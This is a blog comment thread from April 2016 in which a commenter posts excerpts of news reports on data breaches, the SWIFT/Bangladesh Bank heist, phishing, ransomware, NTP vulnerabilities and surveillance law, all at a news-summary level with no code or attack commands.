    http://techcrunch.com/2016/04/25/hundreds-of-spotify-credentials-appear-online-users-report-accounts-hacked-emails-changed/

    A list containing hundreds of Spotify account credentials – including emails, usernames, passwords, account type and other details – has popped up on the website Pastebin, in what appears to be a possible security breach.

    It’s unclear, then, where these particular account details were acquired,

    Spotify has dealt with security incidents in the past, so one can’t immediately assume that a list of emails like this is related to a new data breach.

    To resolve the matter, users said they’ve had to work with Spotify customer service to get their account access restored.

    Reply
27. April 26, 2016 at 7:34 am

    Tomi Engdahl says:

    BeautifulPeople.com Leaks Very Private Data of 1.1 Million ‘Elite’ Daters — And It’s All For Sale
    http://www.forbes.com/sites/thomasbrewster/2016/04/25/beautiful-people-hack-sexual-preference-location-addresses/#e8bd318559fd

    Sexual preference. Relationship status. Income. Address. These are just some details applicants for the controversial dating site BeautifulPeople.com are asked to supply before their physical appeal is judged by the existing user base, who vote on who is allowed in to the “elite” club based on looks alone. All of this, of course, is supposed to remain confidential. But much of that supposedly-private information is now public, thanks to the leak of a database containing sensitive data of 1.1 million BeautifulPeople.com users. The leak, according to one researcher, also included 15 million private messages between users. Another said the data is now being sold by traders lurking in the murky corners of the web.

    But the information – which now appears to be real user data despite being hosted on a non-production server – was taken by one or more less-than-scrupulous individuals before the lockdown, making it out into the dirty world of data trading this year. That’s according to Troy Hunt, an Australian security expert who runs the website HaveIBeenPwned.com, where people can check if their own information has been leaked in some of the biggest breaches in recent memory, from Adobe to Ashley Madison. The data has been traded online, Hunt said,

    Other leaked data included weight, height, job, education, body type, eye colour and hair hue, as well as email address and mobile phone number. Location data, in the form of latitude and longitude, were also leaked, along with smoking and drinking habits, interests and favourite TV shows, movies and books. Anyone using the site expecting privacy should now consider themselves exposed, right down to their appearance, whereabouts and interests.

    Today, the company re-sent its original statement on the breach, first received by FORBES in December. “We can confirm we were notified of a breach on December 24th of 2015 of one of our MongoDB test servers.”

    Reply
28. April 26, 2016 at 10:48 am

    Tomi Engdahl says:

    Exclusive: SWIFT warns customers of multiple cyber fraud cases
    http://www.reuters.com/article/us-cyber-banking-swift-exclusive-idUSKCN0XM2DI

    SWIFT, the global financial network that banks use to transfer billions of dollars every day, warned its customers on Monday that it was aware of “a number of recent cyber incidents” where attackers had sent fraudulent messages over its system.

    The disclosure came as law enforcement authorities in Bangladesh and elsewhere investigated the February cyber theft of $81 million from the Bangladesh central bank account at the New York Federal Reserve Bank. SWIFT has acknowledged that the scheme involved altering SWIFT software on Bangladesh Bank’s computers to hide evidence of fraudulent transfers.

    BAE’s evidence suggested that hackers manipulated SWIFT’s Alliance Access server software, which banks use to interface with SWIFT’s messaging platform, to cover their tracks.

    SWIFT provided some evidence about how that happened in its note to customers, saying that in most cases the modus operandi was similar.

    Reply
29. April 26, 2016 at 11:15 am

    Tomi Engdahl says:

    Website extortionists rake in over $100,000 without lifting a finger
    ‘Armada Collective’ threatens to carry out DDoS attacks, never actually attacks
    http://www.theregister.co.uk/2016/04/25/extortionists_rake_in_100000_easy/

    Reputation is everything in business: it appears a bunch of canny scammers have stolen the identity of a hacking squad to make some serious bank.

    Back in November, a group calling itself the Armada Collective carried out a series of distributed denial of service (DDoS) attacks on webmail providers who refused to pay them a protection fee in Bitcoins. Some alleged members of the group were arrested in January, but now reports are coming in that someone is purely using their reputation for criminal gain.

    Reply
30. April 26, 2016 at 11:15 am

    Tomi Engdahl says:

    Facebook’s own TLS cert used by crooks in double logon phish
    Phish me once, shame on Facebook; phish me twice, shame on Facebook anyway
    http://www.theregister.co.uk/2016/04/26/phishers_target_security_skeptics_with_tempting_facebook_validation_bait/

    Netcraft security man Paul Mutton says phishers are using Facebook’s TLS certificate to create a ‘remarkably convincing’ scam that would go unnoticed by most users.

    The phish uses an iframe to serve a Facebook verification form, but that form isn’t from The Social NetworkTM. Instead, the form comes from an external Hostgator site that uses HTTPS and Facebook’s certificate.

    That combination means browsers don’t warn users of the impending danger.

    Once users log in from the form in the iframe form, a second fake login form appears claiming that the details into the first fake form were incorrect. Users are prompted to log in again.

    Reply
31. April 26, 2016 at 11:20 am

    Tomi Engdahl says:

    Revealed: The Bangladeshi malware that screwed SWIFT out of $81m
    Global payments system upgrade to block future attacks
    http://www.theregister.co.uk/2016/04/25/bangladeshi_malware_screwed_swift/

    February’s hack against Bangladesh’s central bank that netted $81m in diverted funds is one of the biggest cyber heists of all time, and now researchers think they’ve found the malware that did it.

    The software was spotted on a Bangladeshi malware forum by researchers at defense contractors BAE Systems, and appears to have been custom-made to fool the SWIFT (Society for Worldwide Interbank Financial Telecommunication) global payments system and its Alliance Access backend.

    SWIFT is an international inter-bank payments system. The malware was designed to set up fraudulent transfers using the network, bypass the safety routines set up by the banking industry, and then cover the tracks of the thieves long enough for them to launder the funds.

    Reply
32. April 27, 2016 at 4:15 am

    Tomi Engdahl says:

    Joseph Menn / Reuters:
    Apple says it received its first FBI tip via Vulnerability Equities Process on April 14; vulnerability already fixed on iOS9 and El Capitan

    Apple says FBI gave it first vulnerability tip on April 14
    http://www.reuters.com/article/us-apple-encryption-fbi-disclosure-idUSKCN0XO00T

    The FBI informed Apple Inc of a vulnerability in its iPhone and Mac software on April 14, the first time it had told the company about a flaw in Apple products under a controversial White House process for sharing such information, the company told Reuters on Tuesday.

    The FBI told the company that the disclosure resulted from the so-called Vulnerability Equities Process for deciding what to do with information about security holes, Apple said.

    The process, which has been in place in its current form since 2014, is meant to balance law enforcement and U.S. intelligence desires to hack into devices with the need to warn manufacturers so that they can patch holes before criminals and other hackers take advantage of them.

    Reply
33. April 27, 2016 at 7:47 am

    Tomi Engdahl says:

    Qatari hack: bank ‘investigating’ leak
    Dossier-building third party probably dumped the data
    http://www.theregister.co.uk/2016/04/27/qatari_hack_bank_investigating_leak/

    After yesterday’s allegations of a file leak, the Qatar National Bank has issued a neither-confirm-nor-deny statement about the data dump.

    As El Reg reported yesterday, a zipfile first posted appeared, disappeared re-appeared on Cryptome.org, leaving claims it contains personal data of the bank’s customers in its wake.

    The bank’s statement says it’s not going to “comment on reports circulated via social media

    Doha News reports that the leaked files (the 500 MB-plus zipfile is still online at Cryptome) mostly recorded details of Al Jazeera staff.

    However, other folders in the dump include information purporting to be about members of the Qatari royal family, the police, government employees, defence and police, “spies”, and Qatar’s intelligence service, Mukhabarat.

    Reply
34. April 27, 2016 at 7:47 am

    Tomi Engdahl says:

    Kaspersky cracks CryptXXX, throws lifeline to ransomware victims
    Nasty bug tries to confuse you by glowing slow on external storage encryption
    http://www.theregister.co.uk/2016/04/27/cryptxxx_cracked/

    Reply
35. April 27, 2016 at 8:07 am

    Tomi Engdahl says:

    News & Analysis
    IoT Security Spending to Skyrocket
    http://www.eetimes.com/document.asp?doc_id=1329533&

    Global enterprises and consumers will pump nearly $350 million into securing the Internet of Things (IoT) this year, a figure that is set to grow exponentially in coming years as networks of connected objects expand, according to market research firm Gartner Inc.

    According to Gartner’s latest forecast, IoT security spending is set to nearly double between 2014 and 2018, growing from about $232 million to nearly $550 million. The market research firm predicts that IoT security spending growth will pick up significantly after 2020, as improved skills, organizational change and more scalable service options improve execution.

    “The market for IoT security products is currently small but it is growing as both consumers and businesses start using connected devices in ever greater numbers,” said Ruggero Contu, a Gartner research director, in a statement.

    Gartner projects that there will be 6.4 bill connected devices in use worldwide this year, up 30% from last year. The firm estimates that were will be some 11.4 connected devices by 2018.

    “However, considerable variation exists among different industry sectors as a result of different levels of prioritization and security awareness,” Cantu said.

    Much of the attention focused on IoT security vulnerabilities to date has focused on vehicles and other large equipment that, if compromised, could have the potential to cause significant damage, injury and loss of life.

    According to Gartner’s forecast, by 2020 more than 25% of identified security attacks in enterprises will involve IoT. However, the firm projects that IoT will still account for less than 10% of IT security budgets.

    Reply
36. April 27, 2016 at 8:35 am

    Tomi Engdahl says:

    Exclusive: SWIFT warns customers of multiple cyber fraud cases
    http://uk.reuters.com/article/us-cyber-banking-swift-exclusive-idUKKCN0XM2DI

    SWIFT, the global financial network that banks use to transfer billions of dollars every day, warned its customers on Monday that it was aware of “a number of recent cyber incidents” where attackers had sent fraudulent messages over its system.

    The disclosure came as law enforcement authorities in Bangladesh and elsewhere investigated the February cyber theft of $81 million from the Bangladesh central bank account at the New York Federal Reserve Bank. SWIFT has acknowledged that the scheme involved altering SWIFT software on Bangladesh Bank’s computers to hide evidence of fraudulent transfers.

    Reply
37. April 27, 2016 at 11:03 am

    Tomi Engdahl says:

    Bangladesh Bank hackers compromised SWIFT software, warning issued
    http://www.reuters.com/article/us-usa-nyfed-bangladesh-malware-exclusiv-idUSKCN0XM0DR

    The attackers who stole $81 million from the Bangladesh central bank probably hacked into software from the SWIFT financial platform that is at the heart of the global financial system, said security researchers at British defense contractor BAE Systems.

    SWIFT, a cooperative owned by 3,000 financial institutions, confirmed to Reuters that it was aware of malware targeting its client software. Its spokeswoman Natasha Deteran said SWIFT on Monday released a software update to thwart the malware, along with a special warning for financial institutions to scrutinize their security procedures.

    Reply
38. April 27, 2016 at 11:41 am

    Tomi Engdahl says:

    Revenge pornography victims as young as 11, investigation finds
    http://www.bbc.com/news/uk-england-36054273

    Children as young as 11 are among more than 1,000 alleged victims of revenge porn who reported offences in the first year of the new law coming into effect, it has been revealed.

    In April 2015, it became an offence to share private sexual photographs or films without the subject’s consent.

    Revenge porn refers to the act of a partner or ex-partner purposefully distributing images or videos of a sexual nature without the other person’s consent.

    Reply
39. April 27, 2016 at 11:42 am

    Tomi Engdahl says:

    India will require physical panic buttons on all mobile phones to prevent violence against women
    http://techcrunch.com/2016/04/27/india-panic-button/?ncid=rss&utm_source=feedburner&utm_medium=feed&utm_campaign=Feed%3A+Techcrunch+%28TechCrunch%29

    In a bid to prevent crimes against women, all mobile phones sold in India will be required to have a physical panic button installed by the beginning of next year. Department of Telecommunications minister Ravi Shankar Prasad said on Twitter that the new rule will go into effect in January 2017. When pressed, the panic button will send an alert to police and people chosen by the phone’s user.

    Reply
40. April 27, 2016 at 11:48 am

    Tomi Engdahl says:

    Edward Snowden serious warning to Finland: You are tuned too expensive and unnecessary law

    Edward Snowden visited Finland, though only through a video link. ICTExpo event spoken Snowden commented on the proposed new intelligence law. Snowden initially amused the audience by greeting Finnish yelps by video link over a “Good morning”.

    The very first interview Snowden took a position in Finland rotating hot perunana Inquiries Act. The original proposal, the law is designed to monitor the “cross-border Internet traffic”. Snowden believes that the construction of such a system is a step towards internal traffic monitoring, technical leap is easy. Although the original intention of the law would be good, it is likely to lead to a useless and costly monitoring organization.

    Snowden compared the Finnish State budget for the failure of the American spying its own citizens. NSA’s annual budget is 10 billion a year, the size of the civilian intelligence budget is 53 billion and including military intelligence all the intelligence the United States a year to pay an annual $ 75 billion.

    Although phishing has been completed 10 years with these giant budgets, studies have shown that even a single terrorist attack has not been prevented.

    Snowden believes that the current system, in which suspected terrorists can hack into computers and steal the encryption keys are functional. Then phishing measures are aimed only to suspected terrorists, not ordinary citizens.

    Source: http://www.tivi.fi/Kaikki_uutiset/edward-snowdenilta-vakava-varoitus-suomelle-olette-saatamassa-turhan-ja-kalliin-lain-6545332

    Reply
41. April 27, 2016 at 10:20 pm

    Tomi Engdahl says:

    VPN User Arrested
    http://fried.com/news/vpn-user-arrested/

    After an investigation into a ‘disgraced judge’ in the USA, said judge was arrested after his online activity was successfully traced back to his personal IP address (and thus location/identity).

    Yes, it looks like UK-based VPN provider HideMyAss has again proven that it does not offer truly great “privacy protection” to its users. Just as the VPN service did 4 years ago, it has once again shared usage logs and personal information of a paying user to authorities.

    Although HideMyAss responded to their sharing of a user’s data and information back in 2011 by saying that it’s “naive” to think that just by using a VPN service you are free to perform illegal activities “without any consequences” — having a consistent, high level of privacy protection is exactly the reason 99% of VPN users choose to pay and use the software in the first place.

    thankfully there are many VPN service providers that perform just as well as HideMyAss (if not better), that actually do care about giving their users as much privacy protection as possible by keeping zero-logs. Some such providers are ExpressVPN, Buffered and TotalVPN.

    Reply
42. April 28, 2016 at 11:46 am

    Tomi Engdahl says:

    Email privacy bill unanimously passes U.S. House
    http://www.reuters.com/article/us-usa-congress-email-idUSKCN0XO1J7

    The U.S. House of Representatives voted unanimously on Wednesday to require law enforcement authorities to get a search warrant before asking technology companies to hand over old emails.

    The bill’s prospects in the Senate remain unclear, though the 419-0 vote in the House was likely to put pressure on the upper chamber to approve it.

    Under the Email Privacy Act, which updates a decades-old law, authorities would have to get a warrant to access emails or other digital communications more than 180 days old. At present, agencies such as the U.S. Justice Department and the Securities and Exchange Commission only need a subpoena to seek such data from a service provider.

    The issue of law enforcement access to private electronic communications has been at the center of an international debate.

    Reply
43. April 28, 2016 at 1:55 pm

    Tomi Engdahl says:

    Time for a patch: six vulns fixed in NTP daemon
    What’s the time? It’s time to get ill. Unless you fix these beastly flaws

    http://www.theregister.co.uk/2016/04/28/time_for_a_patch_six_vulns_fixed_in_ntp_daemon/

    Cisco has turned over a bunch of Network Time Protocol daemon (ntpd) vulnerabilities to the Linux Foundation’s Core Infrastructure Initiative.
    The vulnerabilities, discovered during its ongoing ntpd evaluation, “allow attackers to craft UDP packets to either cause a denial of service condition or to prevent the correct time being set”, Cisco’s Talos Security Intelligence and Research Group

    CVE-2016-1550, described as an NTP authentication potential timing vulnerability

    CVE-2016-1551, an NTP refclock impersonation vulnerability, is less serious.

    CVE-2016-1549 is an NTP ephemeral association sybil vulnerability

    CVE-2016-1547, “demobilization of preemptible associations”, is a denial-of-service vulnerability.”

    CVE-2016-1548 “Xleave pivot: NTP basic mode to interleaved”.

    The vulnerabilities have been fixed in NTP http://ntp.org/downloads.html version 4.2.8p7

    Vulnerability Spotlight: Further NTPD Vulnerabilities
    http://blog.talosintel.com/2016/04/vulnerability-spotlight-further-ntpd_27.html#more

    Reply
44. April 28, 2016 at 2:03 pm

    Tomi Engdahl says:

    Child Porn Suspect Jailed Indefinitely For Refusing To Decrypt Hard Drives
    https://yro.slashdot.org/story/16/04/27/2357253/child-porn-suspect-jailed-indefinitely-for-refusing-to-decrypt-hard-drives

    A Philadelphia man suspected of possessing child pornography has been in jail for seven months and counting after being found in contempt of a court order demanding that he decrypt two password-protected hard drives. The suspect, a former Philadelphia Police Department sergeant, has not been charged with any child porn crimes. Instead, he remains indefinitely imprisoned in Philadelphia’s Federal Detention Center for refusing to unlock two drives encrypted with Apple’s FileVault software in a case that once again highlights the extent to which the authorities are going to crack encrypted devices.

    Child porn suspect jailed indefinitely for refusing to decrypt hard drives
    Man to remain locked up “until such time that he fully complies” with court order.
    http://arstechnica.com/tech-policy/2016/04/child-porn-suspect-jailed-for-7-months-for-refusing-to-decrypt-hard-drives/

    The suspect’s attorney, Federal Public Defender Keith Donoghue, urged a federal appeals court on Tuesday to release his client immediately, pending the outcome of appeals. “Not only is he presently being held without charges, but he has never in his life been charged with a crime,

    The government successfully cited a 1789 law known as the All Writs Act to compel (PDF) the suspect to decrypt two hard drives it believes contain child pornography. The All Writs Act was the same law the Justice Department asserted in its legal battle with Apple, in which a magistrate ordered the gadget maker to write code to assist the authorities in unlocking the iPhone used by one of two shooters who killed 14 people at a San Bernardino County government building in December. The authorities dropped that case after they paid a reported $1 million for a hack.

    Reply
45. April 29, 2016 at 8:15 am

    Tomi Engdahl says:

    Dustin Volz / Reuters:
    Supreme Court approves change that will allow US judges to issue search warrants for computers located in any jurisdiction

    U.S. high court approves rule change to expand FBI hacking power
    http://www.reuters.com/article/us-usa-cyber-warrants-highcourt-idUSKCN0XP2XU

    The Supreme Court on Thursday approved a rule change that would let U.S. judges issue search warrants for access to computers located in any jurisdiction despite opposition from civil liberties groups who say it will greatly expand the FBI’s hacking authority.

    Magistrate judges normally can order searches only within the jurisdiction of their court, which is typically limited to a few counties.

    The U.S. Justice Department, which has pushed for the rule change since 2013, has described it as a minor modification needed to modernize the criminal code for the digital age, and has said it would not permit searches or seizures that are not already legal.

    could run afoul of the U.S. Constitution’s protections against unreasonable searches and seizures.

    Reply
46. April 29, 2016 at 12:27 pm

    Tomi Engdahl says:

    Linux infosec outfit does a Torvalds, rageblocks innocent vuln spotter
    Handbags at dawn: Firm reacts badly to Twitter tip-off, minor catfight ensues
    http://www.theregister.co.uk/2016/04/27/linux_security_bug_report_row/

    An open source security firm has blocked a security researcher who reported flaws in a recently issued patch in an apparent fit of pique.

    Hector Martin took to Twitter on Tuesday to note a trivial crashing vulnerability in a recently issued patch by Grsecurity.

    “I literally crashed my box by pasting a bunch of text into a terminal, due to a really sad bug in the patch,” Martin said.

    Reply
47. April 29, 2016 at 12:30 pm

    Tomi Engdahl says:

    Toy Maker Maisto Unwittingly Serves Up CryptXXX Ransomware
    https://blog.malwarebytes.org/threat-analysis/2016/04/toy-maker-maisto-unwittingly-serves-up-cryptxxx-ransomware/

    The website of popular American brand Maisto, known for miniature and radio-controlled toy vehicles, was caught pushing the Angler exploit kit eventually leading to ransomware infections.

    According to website security company Sucuri, maisto[.]com is running on a Microsoft IIS server and showing an outdated version of the Joomla Content Management System, therefore exposing itself to automated hacks.

    Malicious code was injected directly into the homepage and bears the same pattern as the pseudo-darkleech campaign, also discovered by Sucuri.

    Safety 101: Virus-fighting utilities
    Tool for decrypting files affected by Trojan-Ransom.Win32.Rannoh infection
    https://support.kaspersky.com/viruses/disinfection/8547#block1

    Reply
48. April 29, 2016 at 12:44 pm

    Tomi Engdahl says:

    The 7ev3n-HONE$T ransomware encrypts and renames your files to R5A
    http://www.bleepingcomputer.com/news/security/the-7ev3n-honest-ransomware-encrypts-and-renames-your-files-to-r5a/

    A security researcher named Mosh​ has discovered a new variant of the 7ev3n Ransomware, which has rebranded itself as 7ev3n-HONE$T. This ransomware will encrypt your data and then ransom your files for approximately $400 USD in bitcoins. It is currently unknown how it is being distributed or what encryption type it uses. Unfortunately, there is no way to decrypt the files for free at this time.

    7ev3n ransomware alters name, asks for much lower ransom
    https://www.grahamcluley.com/2016/04/7ev3n-ransomware-alters-asks-lower-ransom/

    Security researchers originally detected the 7ev3n ransomware back in January of this year.

    Though it hasn’t been around for long, this crypto-malware sample has already made waves for several distinguishing features, such as a ransom fee of 13 Bitcoins (more than US $5,000)

    There is still very little known about the new variant. For instance, while Mosh has confirmed 7ev3n-HONE$T relies on the same encryption process as that of its predecessor, it is unclear how the ransomware is distributed and whether it still installs several damaging files onto a victim’s computer.

    Neither is there mention made of why the new variant asks for a ransom fee of only one Bitcoin (approximately US $400).

    Reply
49. April 29, 2016 at 12:48 pm

    Tomi Engdahl says:

    Former Tor developer created malware for the FBI to hack Tor users
    http://www.dailydot.com/politics/government-contractor-tor-malware/

    How does the U.S. government beat Tor, the anonymity software used by millions of people around the world? By hiring someone with experience on the inside.

    A former Tor Project developer created malware for the Federal Bureau of Investigation that allowed agents to unmask users of the anonymity software.

    Matt Edman is a cybersecurity expert who worked as a part-time employee at Tor Project, the nonprofit that builds Tor software and maintains the network, almost a decade ago.

    Since then, he’s developed potent malware used by law enforcement to unmask Tor users. It’s been wielded in multiple investigations by federal law-enforcement and U.S. intelligence agencies in several high-profile cases.

    Reply
50. April 29, 2016 at 12:59 pm

    Tomi Engdahl says:

    Facial recognition service becomes a weapon against Russian porn actresses
    “FindFace” was created to find friends, but some are using it to harass women.
    http://arstechnica.co.uk/tech-policy/2016/04/facial-recognition-findface-used-against-russian-porn-actresses/

    The developers behind “FindFace,” which uses facial recognition software to match random photographs to people’s social media pages on Vkontakte, say the service is designed to facilitate making new friends. Released in February this year, FindFace started gaining popularity in March after a software engineer named Andrei Mima wrote about using the service to track down two women he photographed six years earlier on a street in St. Petersburg. (They’d asked him to take a picture of them, but he never got their contact information, so he wasn’t able to share it with them at the time.)

    From the start, FindFace has raised privacy concerns. (Even in his glowing recommendation, Mima addressed fears that the service further erodes people’s freedoms in the age of the Internet.) In early April, a young artist named Egor Tsvetkov highlighted how invasive the technology can be, photographing random passengers on the St. Petersburg subway and matching the pictures to the individuals’ Vkontakte pages using FindFace.

    “In theory,” Tsvetkov told RuNet Echo, “this service could be used by a serial killer or a collector trying to hunt down a debtor.”

    Hoping to raise concerns about the potential misuses of FindFace, Tsvetkov seems to have inspired a particularly nasty effort to identify and harass Russian women who appear in pornography.

    The Internet users behind the doxing campaign say their motivation is moral outrage, claiming that women in the sex industry are “corrupt and deceptive.”

    Reply